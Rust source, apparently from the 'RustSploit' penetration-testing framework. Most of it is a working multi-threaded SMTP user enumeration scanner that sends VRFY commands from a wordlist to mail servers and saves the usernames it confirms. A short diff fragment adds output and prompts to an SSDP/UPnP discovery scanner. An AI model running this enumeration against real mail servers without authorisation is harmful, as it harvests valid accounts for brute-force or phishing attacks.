const DEFAULT_TIMEOUT_MS: u64 = 3000;
|
||||
/// If username wordlist is larger than this, switch to streaming mode
|
||||
const STREAMING_THRESHOLD_BYTES: u64 = 50 * 1024 * 1024; // 50 MB
|
||||
|
||||
struct Statistics {
|
||||
total_checked: AtomicU64,
|
||||
valid_users: AtomicU64,
|
||||
invalid_users: AtomicU64,
|
||||
error_attempts: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_checked: AtomicU64::new(0),
|
||||
valid_users: AtomicU64::new(0),
|
||||
invalid_users: AtomicU64::new(0),
|
||||
error_attempts: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_check(&self, valid: bool, error: bool) {
|
||||
self.total_checked.fetch_add(1, Ordering::Relaxed);
|
||||
if error {
|
||||
self.error_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else if valid {
|
||||
self.valid_users.fetch_add(1, Ordering::Relaxed);
|
||||
} else {
|
||||
self.invalid_users.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let total = self.total_checked.load(Ordering::Relaxed);
|
||||
let valid = self.valid_users.load(Ordering::Relaxed);
|
||||
let invalid = self.invalid_users.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} checked | {} valid | {} invalid | {} err | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
total.to_string().bold(),
|
||||
valid.to_string().green(),
|
||||
invalid,
|
||||
errors.to_string().red(),
|
||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_final(&self) {
|
||||
println!();
|
||||
let total = self.total_checked.load(Ordering::Relaxed);
|
||||
let valid = self.valid_users.load(Ordering::Relaxed);
|
||||
let invalid = self.invalid_users.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
|
||||
println!("{}", "=== Statistics ===".bold());
|
||||
println!(" Total checked: {}", total);
|
||||
println!(" Valid users: {}", valid.to_string().green().bold());
|
||||
println!(" Invalid users: {}", invalid);
|
||||
println!(" Errors: {}", errors.to_string().red());
|
||||
println!(" Elapsed time: {:.2}s", elapsed);
|
||||
if elapsed > 0.0 {
|
||||
println!(" Average rate: {:.1} checks/s", total as f64 / elapsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SMTP Username Enumeration Scanner ║".cyan());
|
||||
println!("{}", "║ Enumerates usernames using SMTP VRFY command ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
#[derive(Clone)]
|
||||
struct SmtpUserEnumConfig {
|
||||
/// Raw target strings (IP/hostname) before normalization
|
||||
targets: Vec<String>,
|
||||
/// Port used for all targets
|
||||
port: u16,
|
||||
/// Username wordlist path
|
||||
username_wordlist: String,
|
||||
/// Number of worker threads
|
||||
threads: usize,
|
||||
/// Per-connection timeout in milliseconds
|
||||
timeout_ms: u64,
|
||||
/// Verbose output flag
|
||||
verbose: bool,
|
||||
}
|
||||
|
||||
/// Main entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Initial target: {}", target).cyan());
|
||||
println!();
|
||||
|
||||
println!("{}", "[ Configuration Menu ]".bold().green());
|
||||
println!(" 1. Single target (use current target only)");
|
||||
println!(" 2. Targets from file (ignore current target)");
|
||||
println!(" 3. Current target + targets from file");
|
||||
println!();
|
||||
let mode = prompt("Select mode [1-3] (default 1): ");
|
||||
|
||||
// Build initial target list based on selected mode
|
||||
let mut targets: Vec<String> = Vec::new();
|
||||
match mode.trim() {
|
||||
"2" => {
|
||||
let file_path = prompt("Targets file (one IP/hostname per line): ");
|
||||
if file_path.trim().is_empty() {
|
||||
return Err(anyhow!("Targets file path cannot be empty in mode 2"));
|
||||
}
|
||||
let loaded = load_targets_from_file(file_path.trim())?;
|
||||
if loaded.is_empty() {
|
||||
return Err(anyhow!("No valid targets loaded from file"));
|
||||
}
|
||||
targets.extend(loaded);
|
||||
}
|
||||
"3" => {
|
||||
if !target.trim().is_empty() {
|
||||
targets.push(target.trim().to_string());
|
||||
}
|
||||
let file_path = prompt("Additional targets file (one IP/hostname per line): ");
|
||||
if file_path.trim().is_empty() {
|
||||
return Err(anyhow!("Targets file path cannot be empty in mode 3"));
|
||||
}
|
||||
let loaded = load_targets_from_file(file_path.trim())?;
|
||||
if loaded.is_empty() {
|
||||
return Err(anyhow!("No valid additional targets loaded from file"));
|
||||
}
|
||||
targets.extend(loaded);
|
||||
}
|
||||
// Default: mode 1 – single target only
|
||||
_ => {
|
||||
if !target.trim().is_empty() {
|
||||
targets.push(target.trim().to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
let port = prompt_port(DEFAULT_SMTP_PORT);
|
||||
let username_wordlist = prompt_wordlist("Username wordlist file: ")?;
|
||||
let threads = prompt_threads(DEFAULT_THREADS);
|
||||
let timeout_ms = prompt_timeout(DEFAULT_TIMEOUT_MS);
|
||||
let verbose = prompt_yes_no("Verbose mode?", false);
|
||||
|
||||
if targets.is_empty() {
|
||||
return Err(anyhow!("No targets specified for SMTP enumeration"));
|
||||
}
|
||||
|
||||
let config = SmtpUserEnumConfig {
|
||||
targets,
|
||||
port,
|
||||
username_wordlist,
|
||||
threads,
|
||||
timeout_ms,
|
||||
verbose,
|
||||
};
|
||||
|
||||
run_smtp_user_enum(config)
|
||||
}
|
||||
|
||||
fn run_smtp_user_enum(config: SmtpUserEnumConfig) -> Result<()> {
|
||||
// Normalize and validate all targets
|
||||
let mut normalized_targets: Vec<(String, String)> = Vec::new();
|
||||
for raw in &config.targets {
|
||||
match normalize_target(raw, config.port) {
|
||||
Ok(addr) => normalized_targets.push((raw.clone(), addr)),
|
||||
Err(e) => {
|
||||
println!(
|
||||
"{}",
|
||||
format!("[!] Skipping target '{}': {}", raw, e).yellow()
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if normalized_targets.is_empty() {
|
||||
return Err(anyhow!("All targets failed validation/normalization"));
|
||||
}
|
||||
|
||||
// Decide whether to load usernames into memory or stream line-by-line
|
||||
let metadata = std::fs::metadata(&config.username_wordlist)
|
||||
.with_context(|| format!("Failed to stat username wordlist: {}", config.username_wordlist))?;
|
||||
let size_bytes = metadata.len();
|
||||
let use_streaming = size_bytes > STREAMING_THRESHOLD_BYTES;
|
||||
|
||||
if !use_streaming {
|
||||
let usernames = read_lines(&config.username_wordlist)?;
|
||||
|
||||
if usernames.is_empty() {
|
||||
return Err(anyhow!("Username wordlist is empty."));
|
||||
}
|
||||
|
||||
println!("{}", format!("[*] Loaded {} username(s).", usernames.len()).cyan());
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[*] Total targets: {} (port {})",
|
||||
normalized_targets.len(),
|
||||
config.port
|
||||
)
|
||||
.cyan()
|
||||
);
|
||||
println!("{}", format!("[*] Threads: {}", config.threads).cyan());
|
||||
println!("{}", format!("[*] Timeout: {}ms", config.timeout_ms).cyan());
|
||||
println!();
|
||||
|
||||
let found = Arc::new(Mutex::new(Vec::new()));
|
||||
let unknown = Arc::new(Mutex::new(Vec::new()));
|
||||
let stop_flag = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
let pool = ThreadPool::new(config.threads);
|
||||
let (tx, rx) = unbounded();
|
||||
|
||||
// Queue work: every username against every target (in-memory mode)
|
||||
for (raw_target, addr) in &normalized_targets {
|
||||
for username in &usernames {
|
||||
tx.send((raw_target.clone(), addr.clone(), username.clone()))?;
|
||||
}
|
||||
}
|
||||
drop(tx);
|
||||
|
||||
// Start progress reporter thread
|
||||
let progress_stop = Arc::clone(&stop_flag);
|
||||
let progress_stats = Arc::clone(&stats);
|
||||
let progress_handle = std::thread::spawn(move || {
|
||||
while !progress_stop.load(Ordering::Relaxed) {
|
||||
progress_stats.print_progress();
|
||||
std::thread::sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS));
|
||||
}
|
||||
});
|
||||
|
||||
// Worker threads
|
||||
for _ in 0..config.threads {
|
||||
let rx = rx.clone();
|
||||
let stop_flag = Arc::clone(&stop_flag);
|
||||
let found = Arc::clone(&found);
|
||||
let unknown = Arc::clone(&unknown);
|
||||
let stats = Arc::clone(&stats);
|
||||
let config = config.clone();
|
||||
|
||||
pool.execute(move || {
|
||||
while let Ok((raw_target, addr, username)) = rx.recv() {
|
||||
if stop_flag.load(Ordering::Relaxed) {
|
||||
break;
|
||||
}
|
||||
|
||||
match verify_smtp_user(&addr, &username, config.timeout_ms) {
|
||||
Ok(Some(response)) => {
|
||||
println!(
|
||||
"\r{}",
|
||||
format!(
|
||||
"[+] VALID: {}@{} - {}",
|
||||
username,
|
||||
raw_target,
|
||||
response.trim()
|
||||
)
|
||||
.green()
|
||||
.bold()
|
||||
);
|
||||
let mut users = found.lock().unwrap();
|
||||
users.push((
|
||||
format!("{}@{}", username, raw_target),
|
||||
response.trim().to_string(),
|
||||
));
|
||||
stats.record_check(true, false);
|
||||
}
|
||||
Ok(None) => {
|
||||
stats.record_check(false, false);
|
||||
if config.verbose {
|
||||
println!(
|
||||
"\r{}",
|
||||
format!("[-] Invalid: {}@{}", username, raw_target).dimmed()
|
||||
);
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
stats.record_check(false, true);
|
||||
let msg = e.to_string();
|
||||
if msg.starts_with("Unknown VRFY response for '") {
|
||||
{
|
||||
let mut unk = unknown.lock().unwrap();
|
||||
unk.push((
|
||||
format!("{}@{}", username, raw_target),
|
||||
msg.clone(),
|
||||
));
|
||||
}
|
||||
if config.verbose {
|
||||
eprintln!(
|
||||
"\r{}",
|
||||
format!(
|
||||
"[?] {}@{} -> {}",
|
||||
username, raw_target, msg
|
||||
)
|
||||
.yellow()
|
||||
);
|
||||
}
|
||||
} else if config.verbose {
|
||||
eprintln!("\r{}", format!("[!] {}: {}", username, msg).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
pool.join();
|
||||
|
||||
// Stop progress reporter
|
||||
stop_flag.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.join();
|
||||
|
||||
// Final reporting including unknown responses
|
||||
return finalize_and_report(found, unknown, stats);
|
||||
}
|
||||
|
||||
// Streaming mode for very large username lists
|
||||
let size_mb = (size_bytes as f64) / (1024.0 * 1024.0);
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[*] Large username wordlist detected (~{:.1} MB) – streaming line by line",
|
||||
size_mb
|
||||
)
|
||||
.cyan()
|
||||
);
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[*] Total targets: {} (port {})",
|
||||
normalized_targets.len(),
|
||||
config.port
|
||||
)
|
||||
.cyan()
|
||||
);
|
||||
println!("{}", format!("[*] Threads: {}", config.threads).cyan());
|
||||
println!("{}", format!("[*] Timeout: {}ms", config.timeout_ms).cyan());
|
||||
println!();
|
||||
|
||||
let found = Arc::new(Mutex::new(Vec::new()));
|
||||
let unknown = Arc::new(Mutex::new(Vec::new()));
|
||||
let stop_flag = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
let pool = ThreadPool::new(config.threads);
|
||||
let (tx, rx) = unbounded();
|
||||
|
||||
// Producer thread: read usernames file line-by-line and enqueue work
|
||||
{
|
||||
let targets_clone = normalized_targets.clone();
|
||||
let path_clone = config.username_wordlist.clone();
|
||||
let tx_clone = tx.clone();
|
||||
|
||||
std::thread::spawn(move || {
|
||||
if let Err(e) =
|
||||
enqueue_streaming_usernames(&path_clone, &targets_clone, tx_clone)
|
||||
{
|
||||
eprintln!(
|
||||
"\r{}",
|
||||
format!("[!] Username producer error: {}", e).red()
|
||||
);
|
||||
}
|
||||
});
|
||||
}
|
||||
drop(tx);
|
||||
|
||||
// Start progress reporter thread
|
||||
let progress_stop = Arc::clone(&stop_flag);
|
||||
let progress_stats = Arc::clone(&stats);
|
||||
let progress_handle = std::thread::spawn(move || {
|
||||
while !progress_stop.load(Ordering::Relaxed) {
|
||||
progress_stats.print_progress();
|
||||
std::thread::sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS));
|
||||
}
|
||||
});
|
||||
|
||||
// Worker threads
|
||||
for _ in 0..config.threads {
|
||||
let rx = rx.clone();
|
||||
let stop_flag = Arc::clone(&stop_flag);
|
||||
let found = Arc::clone(&found);
|
||||
let unknown = Arc::clone(&unknown);
|
||||
let stats = Arc::clone(&stats);
|
||||
let config = config.clone();
|
||||
|
||||
pool.execute(move || {
|
||||
while let Ok((raw_target, addr, username)) = rx.recv() {
|
||||
if stop_flag.load(Ordering::Relaxed) {
|
||||
break;
|
||||
}
|
||||
|
||||
match verify_smtp_user(&addr, &username, config.timeout_ms) {
|
||||
Ok(Some(response)) => {
|
||||
println!(
|
||||
"\r{}",
|
||||
format!(
|
||||
"[+] VALID: {}@{} - {}",
|
||||
username,
|
||||
raw_target,
|
||||
response.trim()
|
||||
)
|
||||
.green()
|
||||
.bold()
|
||||
);
|
||||
let mut users = found.lock().unwrap();
|
||||
users.push((
|
||||
format!("{}@{}", username, raw_target),
|
||||
response.trim().to_string(),
|
||||
));
|
||||
stats.record_check(true, false);
|
||||
}
|
||||
Ok(None) => {
|
||||
stats.record_check(false, false);
|
||||
if config.verbose {
|
||||
println!(
|
||||
"\r{}",
|
||||
format!("[-] Invalid: {}@{}", username, raw_target).dimmed()
|
||||
);
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
stats.record_check(false, true);
|
||||
let msg = e.to_string();
|
||||
if msg.starts_with("Unknown VRFY response for '") {
|
||||
{
|
||||
let mut unk = unknown.lock().unwrap();
|
||||
unk.push((
|
||||
format!("{}@{}", username, raw_target),
|
||||
msg.clone(),
|
||||
));
|
||||
}
|
||||
if config.verbose {
|
||||
eprintln!(
|
||||
"\r{}",
|
||||
format!(
|
||||
"[?] {}@{} -> {}",
|
||||
username, raw_target, msg
|
||||
)
|
||||
.yellow()
|
||||
);
|
||||
}
|
||||
} else if config.verbose {
|
||||
eprintln!("\r{}", format!("[!] {}: {}", username, msg).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
pool.join();
|
||||
|
||||
// Stop progress reporter
|
||||
stop_flag.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.join();
|
||||
|
||||
// Final reporting including unknown responses
|
||||
finalize_and_report(found, unknown, stats)
|
||||
}
|
||||
|
||||
/// Verify a username using SMTP VRFY command
|
||||
/// Returns Ok(Some(response)) if user exists, Ok(None) if user doesn't exist, Err on connection/protocol error
|
||||
fn verify_smtp_user(addr: &str, username: &str, timeout_ms: u64) -> Result<Option<String>> {
|
||||
let socket = addr
|
||||
.to_socket_addrs()?
|
||||
.next()
|
||||
.ok_or_else(|| anyhow!("Could not resolve address"))?;
|
||||
|
||||
let stream = TcpStream::connect_timeout(&socket, Duration::from_millis(timeout_ms))
|
||||
.context("Connection timeout")?;
|
||||
|
||||
stream.set_read_timeout(Some(Duration::from_millis(timeout_ms)))?;
|
||||
stream.set_write_timeout(Some(Duration::from_millis(timeout_ms)))?;
|
||||
|
||||
let mut telnet = Telnet::from_stream(Box::new(stream), 256);
|
||||
let timeout = Duration::from_millis(timeout_ms);
|
||||
|
||||
// Read initial banner (220 response)
|
||||
let mut banner_ok = false;
|
||||
let start = Instant::now();
|
||||
while start.elapsed() < timeout {
|
||||
match telnet.read() {
|
||||
Ok(Event::Data(data)) => {
|
||||
let response = String::from_utf8_lossy(&data);
|
||||
if response.starts_with("220") {
|
||||
banner_ok = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
Ok(_) => continue,
|
||||
Err(_) => break,
|
||||
}
|
||||
}
|
||||
|
||||
if !banner_ok {
|
||||
return Err(anyhow!("No 220 banner received"));
|
||||
}
|
||||
|
||||
// Send VRFY command
|
||||
let vrfy_cmd = format!("VRFY {}\r\n", username);
|
||||
telnet.write(vrfy_cmd.as_bytes())?;
|
||||
|
||||
// Read VRFY response
|
||||
let start = Instant::now();
|
||||
let mut response_text = String::new();
|
||||
|
||||
while start.elapsed() < timeout {
|
||||
match telnet.read() {
|
||||
Ok(Event::Data(data)) => {
|
||||
let response = String::from_utf8_lossy(&data);
|
||||
response_text.push_str(&response);
|
||||
|
||||
// Check for valid user responses (250, 251)
|
||||
if response.starts_with("250") || response.starts_with("251") {
|
||||
// User exists
|
||||
telnet.write(b"QUIT\r\n").ok();
|
||||
return Ok(Some(response_text.trim().to_string()));
|
||||
}
|
||||
|
||||
// Check for invalid user responses (550, 551, 553)
|
||||
if response.starts_with("550") || response.starts_with("551") || response.starts_with("553") {
|
||||
// User doesn't exist
|
||||
telnet.write(b"QUIT\r\n").ok();
|
||||
return Ok(None);
|
||||
}
|
||||
|
||||
// Check for ambiguous response (252 - cannot verify)
|
||||
if response.starts_with("252") {
|
||||
// Server explicitly refuses to verify (VRFY disabled) – treat as error
|
||||
telnet.write(b"QUIT\r\n").ok();
|
||||
return Err(anyhow!("Server returned 252 (cannot VRFY) for user '{}'", username));
|
||||
}
|
||||
|
||||
// If we got a complete response line but no known status code, treat as unknown
|
||||
if response.contains("\r\n") {
|
||||
telnet.write(b"QUIT\r\n").ok();
|
||||
return Err(anyhow!(
|
||||
"Unknown VRFY response for '{}': {}",
|
||||
username,
|
||||
response.trim()
|
||||
));
|
||||
}
|
||||
}
|
||||
Ok(_) => continue,
|
||||
Err(_) => break,
|
||||
}
|
||||
}
|
||||
|
||||
// If we didn't get a clear response, treat as error
|
||||
telnet.write(b"QUIT\r\n").ok();
|
||||
Err(anyhow!("No valid VRFY response received"))
|
||||
}
|
||||
|
||||
fn read_lines(path: &str) -> Result<Vec<String>> {
|
||||
let file = File::open(path).context(format!("Failed to open file: {}", path))?;
|
||||
Ok(BufReader::new(file)
|
||||
.lines()
|
||||
.filter_map(Result::ok)
|
||||
.filter(|s| !s.trim().is_empty())
|
||||
.collect())
|
||||
}
|
||||
|
||||
fn enqueue_streaming_usernames(
|
||||
path: &str,
|
||||
targets: &[(String, String)],
|
||||
tx: crossbeam_channel::Sender<(String, String, String)>,
|
||||
) -> Result<()> {
|
||||
let file = File::open(path).context(format!("Failed to open username wordlist: {}", path))?;
|
||||
let reader = BufReader::new(file);
|
||||
|
||||
for line in reader.lines() {
|
||||
let line = line?;
|
||||
let username = line.trim();
|
||||
if username.is_empty() || username.starts_with('#') {
|
||||
continue;
|
||||
}
|
||||
|
||||
let username_owned = username.to_string();
|
||||
for (raw_target, addr) in targets {
|
||||
tx.send((raw_target.clone(), addr.clone(), username_owned.clone()))?;
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn load_targets_from_file(path: &str) -> Result<Vec<String>> {
|
||||
let file = File::open(path).context(format!("Failed to open targets file: {}", path))?;
|
||||
let reader = BufReader::new(file);
|
||||
let mut targets = Vec::new();
|
||||
|
||||
for line in reader.lines() {
|
||||
let line = line?;
|
||||
let trimmed = line.trim();
|
||||
if trimmed.is_empty() || trimmed.starts_with('#') {
|
||||
continue;
|
||||
}
|
||||
targets.push(trimmed.to_string());
|
||||
}
|
||||
|
||||
Ok(targets)
|
||||
}
|
||||
|
||||
fn finalize_and_report(
|
||||
found: Arc<Mutex<Vec<(String, String)>>>,
|
||||
unknown: Arc<Mutex<Vec<(String, String)>>>,
|
||||
stats: Arc<Statistics>,
|
||||
) -> Result<()> {
|
||||
// Print final statistics
|
||||
stats.print_final();
|
||||
|
||||
let found_guard = found.lock().unwrap();
|
||||
if found_guard.is_empty() {
|
||||
println!("{}", "[-] No valid usernames found.".yellow());
|
||||
} else {
|
||||
println!(
|
||||
"{}",
|
||||
format!("[+] Found {} valid username(s):", found_guard.len())
|
||||
.green()
|
||||
.bold()
|
||||
);
|
||||
for (username, response) in found_guard.iter() {
|
||||
println!(" {} {} - {}", "✓".green(), username, response);
|
||||
}
|
||||
|
||||
if prompt("\nSave valid usernames? (y/n): ")
|
||||
.trim()
|
||||
.eq_ignore_ascii_case("y")
|
||||
{
|
||||
let filename = prompt("What should the valid results be saved as?: ");
|
||||
if filename.is_empty() {
|
||||
println!("{}", "[-] Filename cannot be empty.".red());
|
||||
} else {
|
||||
save_results(&filename, &found_guard)?;
|
||||
println!("{}", format!("[+] Results saved to {}", filename).green());
|
||||
}
|
||||
}
|
||||
}
|
||||
drop(found_guard);
|
||||
|
||||
let unknown_guard = unknown.lock().unwrap();
|
||||
if !unknown_guard.is_empty() {
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[?] Collected {} unknown VRFY response(s).",
|
||||
unknown_guard.len()
|
||||
)
|
||||
.yellow()
|
||||
.bold()
|
||||
);
|
||||
|
||||
if prompt("Save unknown responses to file? (y/n): ")
|
||||
.trim()
|
||||
.eq_ignore_ascii_case("y")
|
||||
{
|
||||
let default_name = "smtp_unknown_responses.txt";
|
||||
let filename =
|
||||
prompt(&format!("What should the unknown results be saved as? [{}]: ", default_name));
|
||||
let chosen = if filename.trim().is_empty() {
|
||||
default_name.to_string()
|
||||
} else {
|
||||
filename.trim().to_string()
|
||||
};
|
||||
|
||||
if let Err(e) = save_unknown_responses(&chosen, &unknown_guard) {
|
||||
println!(
|
||||
"{}",
|
||||
format!("[!] Failed to save unknown responses: {}", e).red()
|
||||
);
|
||||
} else {
|
||||
println!(
|
||||
"{}",
|
||||
format!("[+] Unknown responses saved to {}", chosen).green()
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn save_results(path: &str, users: &[(String, String)]) -> Result<()> {
|
||||
let mut file = OpenOptions::new()
|
||||
.create(true)
|
||||
.write(true)
|
||||
.truncate(true)
|
||||
.open(path)?;
|
||||
|
||||
writeln!(file, "# SMTP Username Enumeration Results")?;
|
||||
writeln!(file, "# Generated by RustSploit SMTP User Enum Scanner")?;
|
||||
writeln!(file, "# Total: {} valid username(s)", users.len())?;
|
||||
writeln!(file)?;
|
||||
|
||||
for (username, response) in users {
|
||||
writeln!(file, "{} - {}", username, response)?;
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn save_unknown_responses(path: &str, entries: &[(String, String)]) -> Result<()> {
|
||||
let mut file = OpenOptions::new()
|
||||
.create(true)
|
||||
.write(true)
|
||||
.truncate(true)
|
||||
.open(path)?;
|
||||
|
||||
writeln!(file, "# SMTP Unknown VRFY Responses")?;
|
||||
writeln!(file, "# Generated by RustSploit SMTP User Enum Scanner")?;
|
||||
writeln!(file, "# Total: {} unknown response(s)", entries.len())?;
|
||||
writeln!(file)?;
|
||||
|
||||
for (identity, response) in entries {
|
||||
writeln!(file, "{} - {}", identity, response)?;
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn prompt(msg: &str) -> String {
|
||||
print!("{}", msg);
|
||||
if let Err(e) = io::stdout().flush() {
|
||||
eprintln!("[!] Failed to flush stdout: {}", e);
|
||||
}
|
||||
let mut buffer = String::new();
|
||||
match io::stdin().read_line(&mut buffer) {
|
||||
Ok(_) => buffer.trim().to_string(),
|
||||
Err(e) => {
|
||||
eprintln!("[!] Failed to read input: {}", e);
|
||||
String::new()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_port(default: u16) -> u16 {
|
||||
loop {
|
||||
let input = prompt(&format!("SMTP Port (default {}): ", default));
|
||||
if input.is_empty() {
|
||||
return default;
|
||||
}
|
||||
match input.parse::<u16>() {
|
||||
Ok(0) => println!("{}", "[!] Port cannot be zero. Please enter a value between 1 and 65535.".yellow()),
|
||||
Ok(port) => return port,
|
||||
Err(_) => println!("{}", "[!] Invalid port. Please enter a number between 1 and 65535.".yellow()),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_threads(default: usize) -> usize {
|
||||
loop {
|
||||
let input = prompt(&format!("Threads (default {}): ", default));
|
||||
if input.is_empty() {
|
||||
return default.max(1);
|
||||
}
|
||||
if let Ok(value) = input.parse::<usize>() {
|
||||
if value >= 1 && value <= 1024 {
|
||||
return value;
|
||||
}
|
||||
}
|
||||
println!("{}", "[!] Invalid thread count. Please enter a value between 1 and 1024.".yellow());
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_timeout(default: u64) -> u64 {
|
||||
loop {
|
||||
let input = prompt(&format!("Timeout in milliseconds (default {}): ", default));
|
||||
if input.is_empty() {
|
||||
return default;
|
||||
}
|
||||
match input.parse::<u64>() {
|
||||
Ok(value) if value >= 100 && value <= 60000 => return value,
|
||||
Ok(_) => println!("{}", "[!] Timeout must be between 100 and 60000 milliseconds.".yellow()),
|
||||
Err(_) => println!("{}", "[!] Invalid timeout. Please enter a number.".yellow()),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_yes_no(message: &str, default_yes: bool) -> bool {
|
||||
let default_char = if default_yes { "y" } else { "n" };
|
||||
loop {
|
||||
let input = prompt(&format!("{} (y/n) [{}]: ", message, default_char));
|
||||
if input.is_empty() {
|
||||
return default_yes;
|
||||
}
|
||||
match input.to_lowercase().as_str() {
|
||||
"y" | "yes" => return true,
|
||||
"n" | "no" => return false,
|
||||
_ => println!("{}", "[!] Please respond with y or n.".yellow()),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_wordlist(message: &str) -> Result<String> {
|
||||
loop {
|
||||
let response = prompt(message);
|
||||
if response.is_empty() {
|
||||
println!("{}", "[!] Path cannot be empty.".yellow());
|
||||
continue;
|
||||
}
|
||||
let trimmed = response.trim();
|
||||
if Path::new(trimmed).is_file() {
|
||||
return Ok(trimmed.to_string());
|
||||
} else {
|
||||
println!(
|
||||
"{}",
|
||||
format!("[!] File '{}' does not exist or is not a regular file.", trimmed).yellow()
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn normalize_target(host: &str, port: u16) -> Result<String> {
|
||||
let re = Regex::new(r"^\[*([^\]]+?)\]*(?::(\d{1,5}))?$").unwrap();
|
||||
let t = host.trim();
|
||||
let cap = re
|
||||
.captures(t)
|
||||
.ok_or_else(|| anyhow!("Invalid target: {}", host))?;
|
||||
let addr = cap.get(1).unwrap().as_str();
|
||||
let p = cap
|
||||
.get(2)
|
||||
.map(|m| m.as_str().parse::<u16>().ok())
|
||||
.flatten()
|
||||
.unwrap_or(port);
|
||||
let formatted = if addr.contains(':') && !addr.starts_with('[') {
|
||||
format!("[{}]:{}", addr, p)
|
||||
} else {
|
||||
format!("{}:{}", addr, p)
|
||||
};
|
||||
if formatted.to_socket_addrs()?.next().is_none() {
|
||||
Err(anyhow!("DNS resolution failed: {}", formatted))
|
||||
} else {
|
||||
Ok(formatted)
|
||||
}
|
||||
}
|
||||
|
||||
@@ -2,8 +2,10 @@ use anyhow::{Context, Result};
|
||||
use colored::*;
|
||||
use regex::Regex;
|
||||
use std::collections::HashMap;
|
||||
use std::fs::File;
|
||||
use std::io::Write;
|
||||
use std::net::SocketAddr;
|
||||
use std::time::Instant;
|
||||
use tokio::net::UdpSocket;
|
||||
use tokio::time::{timeout as tokio_timeout, Duration};
|
||||
|
||||
@@ -25,11 +27,24 @@ impl SearchTarget {
|
||||
}
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔══════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SSDP M-SEARCH Scanner ║".cyan());
|
||||
println!("{}", "║ Discovers UPnP devices via SSDP protocol ║".cyan());
|
||||
println!("{}", "╚══════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
|
||||
let port = prompt_port().unwrap_or(1900);
|
||||
let timeout_secs = prompt_timeout().unwrap_or(3);
|
||||
let retries = prompt_retries().unwrap_or(1);
|
||||
let verbose = prompt_verbose().unwrap_or(false);
|
||||
let save_results = prompt_save_results().unwrap_or(false);
|
||||
|
||||
let target = clean_ipv6_brackets(target);
|
||||
// Validate target format
|
||||
@@ -39,9 +54,12 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
// Determine search targets
|
||||
let search_targets = prompt_search_targets()?;
|
||||
|
||||
println!();
|
||||
println!("{}", format!("[*] Sending SSDP M-SEARCH to {}:{}...", target, port).bold());
|
||||
|
||||
let mut found_any = false;
|
||||
let mut results = Vec::new();
|
||||
let start_time = Instant::now();
|
||||
|
||||
for (idx, st) in search_targets.iter().enumerate() {
|
||||
if search_targets.len() > 1 {
|
||||
@@ -60,7 +78,10 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
match send_ssdp_request(&target, port, st, Duration::from_secs(timeout_secs), verbose).await {
|
||||
Ok(Some(response)) => {
|
||||
found_any = true;
|
||||
parse_ssdp_response(&response, &target, port, st.st_header());
|
||||
let result = parse_ssdp_response(&response, &target, port, st.st_header());
|
||||
if let Some(r) = result {
|
||||
results.push(r);
|
||||
}
|
||||
break; // Success, no need to retry
|
||||
}
|
||||
